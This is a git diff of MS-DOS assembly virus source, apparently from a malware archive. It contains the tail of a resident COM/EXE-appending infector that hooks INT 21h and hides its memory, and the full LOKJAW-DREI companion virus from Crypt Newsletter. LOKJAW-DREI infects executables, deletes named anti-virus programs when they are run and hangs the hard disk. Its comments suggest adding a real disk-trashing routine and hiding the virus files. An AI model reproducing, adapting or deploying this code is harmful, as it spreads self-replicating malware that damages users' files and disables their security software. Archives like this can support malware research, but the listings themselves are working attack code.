+;------------------------------------------------------------------------------ +;****************************************************************************** +;------------------------------------------------------------------------------ +;load memory from a COM file... + +com_memory_loader: + call restore_com + call check_for_int_71 + jc go_1 + call get_memory + jnc bbbb + jmp exit_com + +bbbb: call hide_memory + +reset_di: + call set_int_71 + call save_21 + call move_all_code + mov bx,es + call set_21 +go_1: jmp exit_com + +;------------------------------------------------------------------------------ +;Returns ES with my segment (or an error) +;------------------------------------------------------------------------------ +get_memory: + int 12h + mov bx,cs + mov cx,1024 + mul cx + clc + mov cx,600h ;Amount of needed memory + sub ax,cx + sbb dx,0000 ;dx:ax=where we want this mem to end! + mov bx,dx + mov bp,ax ;save this... + mov cx,cs + mov ax,0010h + mul cx + clc + mov cx,di + add cx,offset ending-100h + add ax,cx + adc dx,0000 + clc + sub bp,ax + sbb bx,dx + clc + mov ax,bp + mov dx,bx + mov cx,0010h + div cx ;dx:ax=memory above this-divide it by 16 + mov bx,ax + mov ah,4ah + int 21h + jc get_memory_error + mov bx,60 + mov ah,48h + int 21h + jc get_memory_error + mov es,ax + clc + ret +get_memory_error: + stc + ret +;------------------------------------------------------------------------------ +;Moves all code + PSP to my secretive little segment-destroys DS (in EXE files) +;------------------------------------------------------------------------------ +move_all_code: +;move PSP************************** + push di + xor si,si + xor di,di + mov cx,100h + rep movsb +;********************************** +;move my code********************** + pop si + push si + push cs + pop ds + mov cx,offset ending-100h + rep movsb + pop di + ret +;********************************** +;------------------------------------------------------------------------------ +;------------------------------------------------------------------------------ +;saves interrupt 21 in cs:[int_21_saveo] +save_21: + push es + xor ax,ax + mov es,ax + mov ax,es:[interrupt*4] + mov bx,es:[interrupt*4+2] + mov cs:[di+offset int_21_saveo-100h],ax + mov cs:[di+offset int_21_saves-100h],bx + pop es + ret + +;----------------------------------------------------------------------------- +;sets interrupt 21 to bx:offset of my_21 +set_21: + push es + xor ax,ax + mov es,ax + mov es:[interrupt*4],offset my_21 + mov es:[interrupt*4+2],bx + pop es + ret +;----------------------------------------------------------------------------- +;----------------------------------------------------------------------------- +;Restores a COM file +restore_com: + push di + mov si,di + add si,offset three_bytes-100h + mov di,0100h + mov cx,3 + rep movsb + pop di + ret +;------------------------------------------------------------------------------ +;Hides my segment's (es) size and owner +hide_memory: + push ds + xor cx,cx + mov ds,cx + mov cx,ds:[2eh*4+2] + pop ds + push ds + mov dx,es + dec dx + mov ds,dx + mov ds:[1],cx ;maybe later set to DOS seg + mov byte ptr ds:[0],'Z' + mov word ptr ds:[3],0000 + mov es:[16h],cx + mov es:[0ah],cx + mov es:[0ch],cx + pop ds + ret +;------------------------------------------------------------------------------ + +;check_for_int 71- My little multiplex interrupt +check_for_int_71: + int 71h + cmp ax,9999h + je set_c + clc + ret +set_c: + stc + ret +;------------------------------------------------------------------------------ + +;Set interrupt 71: +set_int_71: + push ds + xor ax,ax + mov ds,ax + mov ds:[71h*4+2],es + mov ds:[71h*4],offset my_71 + pop ds + ret + + +exit_com: + xor cx,cx + xor dx,dx + xor ax,ax + xor bx,bx + xor si,si + xor di,di + mov ax,100h + jmp ax + +exit_exe: + push ds + pop es + mov ax,es + add ax,10h + add word ptr cs:[di+offset orig_cs-100h],ax + cli + add ax,word ptr cs:[di+offset orig_ss-100h] + mov ss,ax + mov sp,word ptr cs:[di+offset orig_sp-100h] + sti + jmp dword ptr cs:[di+offset orig_ip-100h] + +;------------------------------------------------------------------ +my_21: + cmp ah,4bh + je okay_go + cmp ah,0fh + je okay_go + cmp ah,3dh + je okay_go + cmp ah,43h + je okay_go + jmp continue_21 +okay_go: + push ax + push bx + push cx + push dx + push es + push di + push si + push bp + push es + push ds +check_for_com: + xor si,si + mov bx,dx +looper: + cmp word ptr ds:[bx+si],'c.' + je check_om + cmp word ptr ds:[bx+si],'C.' + je check_om + cmp word ptr ds:[bx+si],'e.' + je check_ex + cmp word ptr ds:[bx+si],'E.' + je check_ex + inc si + cmp si,40 + jne looper + jmp give_up1 +check_om: + cmp word ptr ds:[bx+si+2],'mo' + jne bb + mov cs:[com_or_exe],0 + jmp check_for_infection +bb: cmp word ptr ds:[bx+si+2],'MO' + jne cc + mov cs:[com_or_exe],0 + jmp check_for_infection +cc: jmp give_up1 +check_ex: + cmp word ptr ds:[bx+si+2],'ex' + jne label1 + mov cs:[com_or_exe],1234h + jmp okay_do +label1: + cmp word ptr ds:[bx+si+2],'EX' ;FIX ME!!!!!!! + je cccc ;forget exe for now.. + jmp give_up1 +cccc: + mov cs:[com_or_exe],1234h + jmp okay_do +check_for_infection: + cmp word ptr [bx+si-2],'DN' + jne okey_k + jmp give_up1 +okey_k: + cmp word ptr [bx+si-2],'DN' + jne okay_do + jmp give_up1 +okay_do: + mov cs:[storage_1],ds + mov cs:[storage_2],dx + mov ah,50h ;set PSP to ours + push cs + pop bx + call dos_21 + mov ah,43h + xor al,al + call dos_21 + jnc okay9 + jmp give_up +okay9: mov cs:[attrib],cx + mov ah,43h + mov al,1 + xor cx,cx + call dos_21 + mov ah,3dh + mov al,2 + call dos_21 + jnc okay10 + jmp give_up +okay10: mov cs:[handle],ax + mov bx,ax + mov ah,57h + xor al,al + call dos_21 + mov cs:[date],dx + mov cs:[time],cx + mov ax,4202h + xor dx,dx + xor cx,cx + call dos_21 + jnc okay11 + jmp give_up +okay11: mov cs:[file_size],ax + cmp cs:[com_or_exe],1234h + jne okey_p + sub ax,compare_val + sbb dx,0000 + mov cx,dx + mov dx,ax + jmp contin2 +okey_p: xor cx,cx + cmp ax,63000 + jb contin1 + call reset_all + jmp give_up +contin1: + cmp ax,600 + jnb continx + call reset_all + jmp give_up +continx: + sub ax,compare_val + mov dx,ax + xor cx,cx +contin2: + mov ax,4200h + mov bx,cs:[handle] + call dos_21 + mov ah,3fh + push cs + pop ds + mov dx,offset buffer + mov cx,2 + call dos_21 + mov ax,word ptr cs:[buffer] + mov bx,word ptr cs:[offset dont_write-compare_val] + cmp ax,bx + jne dddd + jmp give_up +dddd: + cmp cs:[com_or_exe],1234h + je infect_exe + jmp infect_com + +infect_exe: + mov bx,cs:[handle] + xor dx,dx + xor cx,cx + mov ax,4200h + call dos_21 + push cs + pop ds + mov ah,3fh + mov cx,18h + mov dx,offset header + call dos_21 + cmp word ptr [header+8],1000h + jb okayh + call reset_all + jmp give_up +okayh: mov ax,word ptr [header+16h] + mov orig_cs,ax + mov ax,word ptr [header+14h] + mov orig_ip,ax + mov ax,word ptr [header+0eh] + mov orig_ss,ax + mov ax,word ptr [header+10h] + mov orig_sp,ax + mov ax,4202h + mov bx,handle + xor cx,cx + xor dx,dx + call dos_21 + mov word ptr ds:[exe_or_com],'EX' + mov high_size,dx + mov low_size,ax + mov real_hsize,dx + mov real_lsize,ax + mov ax,word ptr [header+8] + mov cx,10h + mul cx + clc + sub low_size,ax ;high_size:low_size=load size + sbb high_size,dx + clc + mov dx,high_size + mov ax,low_size + mov cx,0010h + div cx + cmp dx,0 + je okay + mov cx,16 + sub cx,dx + mov bp,cx + add real_lsize,bp + adc real_hsize,0000 + clc + stc + adc ax,0000 + jmp okay1 +okay: xor bp,bp +okay1: xor dx,dx + mov word ptr [header+16h],ax + ;add to dx? + mov word ptr [header+14h],dx + mov word ptr [header+0eh],ax + mov dx,0fffeh + mov word ptr [header+10h],dx + mov dx,real_hsize + mov ax,real_lsize + add ax,offset ending-100h+1 + adc dx,0000 + push ax + mov cl,9 + shr ax,cl + ror dx,cl + stc + adc dx,ax + pop ax + and ah,1 + mov word ptr [header+4],dx + mov word ptr [header+2],ax + mov ah,40h + mov bx,handle + mov cx,offset dont_write-100h + add cx,bp + mov dx,100h + sub dx,bp + call dos_21 + mov ax,4200h + xor cx,cx + xor dx,dx + mov bx,handle + call dos_21 + mov ah,40h + mov bx,handle + mov cx,18h + mov dx,offset header + call dos_21 + call reset_all + jmp give_up + +infect_com: + xor cx,cx + xor dx,dx + mov bx,cs:[handle] + mov ax,4200h + call dos_21 + mov ah,3fh + mov cx,3 + push cs + pop ds + mov dx,offset three_bytes + call dos_21 + mov ax,cs:[file_size] + sub ax,3 + mov word ptr cs:[jumper+1],ax + mov word ptr cs:[exe_or_com],'CO' + call write_to_end + xor cx,cx + xor dx,dx + mov ax,4200h + mov bx,cs:[handle] + call dos_21 + mov dx,offset jumper + mov ah,40h + mov cx,3 + call dos_21 + call reset_all +give_up: + mov ah,50h + mov bx,cs:[storage_1] + call dos_21 +give_up1: + pop ds + pop es + pop bp + pop si + pop di + pop es + pop dx + pop cx + pop bx + pop ax + jmp continue_21 +continue_21: + jmp dword ptr cs:[int_21_saveo] +dos_21: + pushf + call dword ptr cs:[int_21_saveo] + ret + +reset_all: + mov bx,cs:[handle] + mov cx,cs:[time] + mov dx,cs:[date] + mov ax,5701h + call dos_21 + mov ah,3eh + mov bx,cs:[handle] + call dos_21 + mov ah,43h + mov al,1 + mov cx,cs:[attrib] + mov ds,cs:[storage_1] + mov dx,cs:[storage_2] + call dos_21 + ret + +write_to_end: + + mov ax,4202h + xor dx,dx + xor cx,cx + mov bx,cs:[handle] + call dos_21 + mov ah,40h + mov cx,offset dont_write-100h + push cs + pop ds + mov dx,0100h + call dos_21 + ret +my_71: + mov ax,9999h + iret + + +jumper: + db 0e9h,00,00 +storage_1 dw 0000 +storage_2 dw 0000 +int_21_saveo dw 0000 +int_21_saves dw 0000 +three_bytes: db 0cdh,20h,90h +db 'Loki' +orig_ip dw 0000 +orig_cs dw 0000 +orig_ss dw 0000 +orig_sp dw 0000 +dont_write: + +header: + db 24 dup(00) +com_or_exe dw 1234h +handle dw 0000 +file_size dw 0000 +attrib dw 0000 +date dw 0000 +time dw 0000 +buffer: dw 0000 +loader_high dw 0000 +loader_low dw 0000 +header_cs dw 0000 +header_ip dw 0000 +low_size dw 0000 +high_size dw 0000 +real_hsize dw 0000 +real_lsize dw 0000 +ending: +Code_seg ENDS +END start \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.lokjawd.asm b/MSDOS/Virus.MSDOS.Unknown.lokjawd.asm new file mode 100644 index 00000000..f8d86711 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.lokjawd.asm @@ -0,0 +1,559 @@ +;LOKJAW-DREI: an .EXE-infecting spawning virus with retaliatory +;anti-anti-virus capability. For Crypt Newsletter 12, Feb. 1993. +; +;LOKJAW-DREI is a resident spawning virus which installs itself in +;memory using the same engine as the original Civil War/Proto-T virus. +;It is simpler in that none of its addresses have to be +;relative, an indirect benefit of the fact that the virus has no +;"appending" quality. That means, LOKJAW doesn't alter its "host" files, +;just like a number of other companion/spawning viruses published in +;previous newsletters. +; +;LOKJAW hooks interrupt 21 and infects .EXE files on execution, creating +;itself as companion .COMfile to the "host." Due to the inherent rules +;of DOS, this ensures the virus will be executed before the "host" the +;next time the infected program is used. In reality, LOKJAW is even +;simpler than that. If not in memory, the first time the host is +;called, LOKJAW will go resident and not even bother to load it. +;In most cases, the user will assume a slight error and call the host +;again, at which point it will function normally. LOKJAW will then infect +;every subsequent .EXE file called. LOKJAW is very transparent in operation, +;except when certain anti-virus programs (Integrity Master, McAfee's SCAN & +;CLEAN, F-PROT & VIRSTOP and Central Point Anti-virus) are loaded. +; +;LOKJAW's "stinger" code demonstrates the simplicity of creating a strongly +;retaliating virus by quickly deleting the anti-virus program before it +;can execute and then displaying a "chomping" graphic. Even if the anti- +;virus program cannot detect LOKJAW in memory, it will be deleted. This +;makes it essential that the user know how to either remove the virus from +;memory before beginning anti-virus measures, or at the least run the +;anti-virus component from a write-protected disk. At a time when retail +;anti-virus packages are becoming more complicated - and more likely that the +;average user will run them from default installations on his hard file - +;LOKJAW's retaliating power makes it a potentially very annoying pest. +;A virus-programmer serious about inconveniencing a system could do a +;number of things with this basic idea. They are; +; 1. Remove the "chomp" effect. It is entertaining, but it exposes the virus +; instantly. +; 2. Alter the_stinger routine, so that the virus immediately attacks the +; hard file. The implementation is demonstrated by LOKJAW-DREI, which +; merely makes the disk inaccessible until a warm reboot if an anti-virus +; program is employed against it. By placing +; a BONA FIDE disk-trashing routine here, it becomes very hazardous for +; an unknowing user to employ anti-virus measures on a machine where +; LOKJAW or a LOKJAW-like program is memory resident. While LOCKAW and +; LOKJAW-ZWEI will produce write-protect errors if an anti-virus program +; is run against them from a write-protected diskette, LOKJAW-DREI +; won't. It will recognize the anti-virus program, display the "chomp" +; and mimic trashing the hard file. This effect makes the disk inacessible +; until the machine is rebooted. +; +;The anti-anti-virus strategies are becoming more common in viral programming. +;Mark Ludwig programmed the features of a direct-action retaliating +;virus in his "Computer Virus Developments Quarterly." Peach, Groove and +;Encroacher viruses attack anti-virus software by deletion of key files. +;And in this issue, the Sandra virus employs a number +;of anti-anti-virus features. +; +;The LOKJAW source listings are TASM compatible. To remove LOKJAW-ZWEI and +;DREI infected files from a system, simply delete the "companion" .COM +;duplicates of your executables. Ensure that the machine has been booted +;from a clean disk. To remove the LOKJAW .COM-appending virus, at this +;time it will be necessary for you to restore the contaminated files from +;a clean back-up. +; +;Alert readers will notice the LOKJAW-ZWEI and DREI create their "companion" +;files in plain sight. Generally, spawning viruses make themselves +;hidden-read-only-system files. This is an easy hack and the code is supplied +;in earlier issues of the newsletter. The modification is left to +;the reader as an academic exercise. + + + .radix 16 + cseg segment + model small + assume cs:cseg, ds:cseg, es:cseg + + org 100h + +oi21 equ endit +filelength equ endit - begin +nameptr equ endit+4 +DTA equ endit+8 + + + + + + +begin: jmp virus_install + +note: + db '[l™‡kõ„W-dâ].á.šrã$ņd‰M–$' + db 'ÅH‹$.pâ™Gâ†m.Œ$.….{pâ™Å”-Å].ûƒâ‹†¤Å,$“âÅ.”Ÿ.' + db '€â˜ž.¥‰w$Àä×îâ' ;I.D. note: will doubtless + ;show up in VSUM + + + ;install +virus_install: mov ax,cs ; reduce memory size + dec ax + mov ds,ax + cmp byte ptr ds:[0000],5a + jne cancel + mov ax,ds:[0003] + sub ax,100 + mov ds:0003,ax +Zopy_virus: + mov bx,ax ; copy to claimed block + mov ax,es + add ax,bx + mov es,ax + mov cx,offset endit - begin + mov ax,ds + inc ax + mov ds,ax + lea si,ds:[begin] + lea di,es:0100 + rep movsb + + + +Grab_21: + + mov ds,cx ; hook int 21h + mov si,0084h ; + mov di,offset oi21 + mov dx,offset check_exec + lodsw + cmp ax,dx ; + je cancel ; exit, if already installed + stosw + movsw + + push es + pop ds + mov ax,2521h ; revector int 21h to virus + int 21h + +cancel: ret + +check_exec: + pushf + + push es ; push everything onto the + push ds ; stack + push ax + push bx + push dx + + cmp ax,04B00h ; is the file being + + + + jne abort ; executed? + + + + + ;if yes, try the_stinger +do_infect: call infect ; then try to infect + + + + +abort: ; restore everything + pop dx + pop bx + pop ax + pop ds + pop es + popf + +Bye_Bye: + ; exit + jmp dword ptr cs:[oi21] + + +new_24h: + mov al,3 ; critical error handler + iret + +infect: + mov cs:[name_seg],ds ; here, the virus essentially + mov cs:[name_off],dx ; copies the name of the + + cld ; loaded file into a buffer + mov di,dx ; so that it can be compared + push ds ; against the default names + pop es ; in the_stinger + mov al,'.' ; subroutine + repne scasb ; <-- + + call the_stinger ; check for anti-virus load + ; and deploy the_stinger + + + + cld + mov word ptr cs:[nameptr],dx + mov word ptr cs:[nameptr+2],ds + + mov ah,2Fh + int 21h + push es + push bx + + push cs + + pop ds + mov dx,offset DTA + mov ah,1Ah + int 21h + + call searchpoint + push di + mov si,offset COM_txt + + mov cx,3 + rep cmpsb + pop di + jz do_com + mov si,offset EXE_txt + nop + mov cl,3 + rep cmpsb + jnz return + +do_exe: mov si,offset COM_txt + nop + call change_ext + mov ax,3300h + nop + int 21h + push dx + + cwd + inc ax + push ax + int 21h + +Grab24h: + + mov ax,3524h + int 21h + push bx + push es + push cs + pop ds + mov dx,offset new_24h + mov ah,25h + push ax + int 21h + + + lds dx,dword ptr [nameptr] ;create the virus (unique name) + xor cx,cx + mov ah,05Bh + int 21 + jc return1 + xchg bx,ax ;save handle + + + + push cs + pop ds + mov cx,filelength ;cx= length of virus + mov dx,offset begin ;where to start copying + mov ah,40h ;write the virus to the + int 21h ;new file + + mov ah,3Eh ; close + int 21h + +return1: pop ax + pop ds + pop dx + int 21h + + pop ax + pop dx + int 21h + + mov si,offset EXE_txt + call change_ext + +return: mov ah,1Ah + pop dx + pop ds + int 21H + + ret + +do_com: call findfirst + cmp word ptr cs:[DTA+1Ah],endit - begin + jne return + mov si,offset EXE_txt + call change_ext + call findfirst + jnc return + mov si,offset COM_txt + call change_ext + jmp short return + +searchpoint: les di,dword ptr cs:[nameptr] + mov ch,0FFh + mov al,0 + repnz scasb + sub di,4 + ret +change_ext: call searchpoint + push cs + pop ds + movsw + movsw + ret + +findfirst: lds dx,dword ptr [nameptr] + mov cl,27h + mov ah,4Eh + int 21h + ret + +the_stinger: + cmp word ptr es:[di-3],'MI' ;Integrity Master + je jumptoass + + cmp word ptr es:[di-3],'XR' ;VIRX + je jumptoass + + cmp word ptr es:[di-3],'PO' ;VIRUSTOP + jne next1 + cmp word ptr es:[di-5],'TS' + je jumptoass + +next1: cmp word ptr es:[di-3],'VA' ;AV = CPAV + je jumptoass + + cmp word ptr es:[di-3],'TO' ;*prot = F-prot + jne next2 + cmp word ptr es:[di-5],'RP' + je jumptoass + +next2: cmp word ptr es:[di-3],'NA' ;*scan = McAfee's Scan. + jne next3 + cmp word ptr es:[di-5],'CS' + je jumptoass + + cmp word ptr es:[di-3],'NA' ;*lean = McAfee's CLEAN. + jne next3 ; why not, eh? + cmp word ptr es:[di-5],'EL' + je jumptoass +next3: ret +jumptoass: jmp chomp ;assassination (deletion) + ; of anti-virus program +chomp: + push cs ; chomper visual + pop ds + mov ah, 03h + int 10h + mov [c1], bh ; save cursor + mov [c2], dh + mov [c3], dl + mov [c4], ch + mov [c5], cl + mov ah, 1 + mov cl, 0 + mov ch, 40h + int 10h + + mov cl, 0 + mov dl, 4Fh + mov ah, 6 + mov al, 0 + mov bh, 0Fh + mov ch, 0 + mov cl, 0 + mov dh, 0 + mov dl, 4Fh + int 10h + + mov ah, 2 + mov dh, 0 + mov dl, 1Fh + mov bh, 0 + int 10h + + mov dx,offset eyes ; print the eyes + mov ah, 9 + mov bl, 0Fh + int 21h + + mov ah, 2 + mov dh, 1 + mov dl, 0 + int 10h + + mov ah, 9 + mov al, 0DCh + mov bl, 0Fh + mov cx, 50h + int 10h + + mov ah, 2 + mov dh, 18h + mov dl, 0 + int 10h + + mov ah, 9 + mov al, 0DFh + mov bl, 0Fh + mov cx, 50h + int 10h + + mov dl, 0 +chomp_1: + mov ah, 2 + mov dh, 2 + int 10h + + mov ah, 9 + mov al, 55h + mov bl, 0Fh + mov cx, 1 + int 10h + + mov ah, 2 + mov dh, 17h + inc dl + int 10h + + mov ah, 9 + mov al, 0EFh + mov bl, 0Fh + int 10h + + inc dl + cmp dl, 50h + jl chomp_1 + mov [data_1], 0 +chomp_3: + mov cx, 7FFFh ; delays + +locloop_4: + loop locloop_4 + + inc [data_1] + cmp [data_1], 0Ah + jl chomp_3 + mov [data_1], 0 + mov cl, 0 + mov dl, 4Fh +chomp_5: + mov ah, 6 + mov al, 1 + mov bh, [data_2] + mov ch, 0Dh + mov dh, 18h + int 10h + + mov ah, 7 + mov al, 1 + mov bh, [data_2] + mov ch, 0 + mov dh, 0Ch + int 10h + mov cx, 3FFFh ; delays + +locloop_6: + loop locloop_6 + inc [data_1] + cmp [data_1], 0Bh + jl chomp_5 + mov [data_1], 0 +chomp_7: + mov cx, 7FFFh ; delays + +locloop_8: + loop locloop_8 + inc [data_1] + cmp [data_1], 0Ah + jl chomp_7 + mov ah, 6 + mov al, 0 + mov bh, [data_2] + mov ch, 0 + mov cl, 0 + mov dh, 18h + mov dl, 4Fh + int 10h + + mov cl, 7 + mov ch, 6 + int 10h + + mov ah, 2 + mov bh, [c1] + mov dh, [c2] + mov dl, [c3] + int 10h + mov al, bh + mov ah, 5 + int 10h + mov ah, 1 + mov ch, [c4] + mov cl, [c5] + int 10h + mov ax, 0003h + int 10h ; sort of a cls + mov ax, 00ffh + + mov si,0 ;scarey part: drive reads real +scarey: lodsb ;fast ala Michelangelo-style + mov ah,al ;over-write, but this routine only + lodsb ;gets random bytes here for a + and al,3 ;cylinder to READ + mov dl,80h + mov dh,al + mov ch,ah + mov cl,1 + mov bx,offset last ;buffer to read into + mov ax,201h + int 13h ;jump into a loop, effectively hang machine + jmp short scarey ;yow! scarey! just think if this + ;was made by someone not as nice as + ;me. + ;It's not much of a stretch to + ;imagine a routine for thumping + ;the hard file in place of scarey. + ;A retaliating virus of this + ;nature is a distinct + ;possibility. + +EXE_txt db 'EXE',0 +COM_txt db 'COM',0 + +eyes db '(o) (o)','$' ; ASCII eyes of Lockjaw + +data_1 db 0 +data_2 db 0 + +last db 090H +name_seg dw ? +name_off dw ? + +c1 db 0 +c2 db 0 +c3 db 0 +c4 db 0 +c5 db 0 +note2: db 'Lokjaw-Drei' + +endit: + + +cseg ends + end begin + + +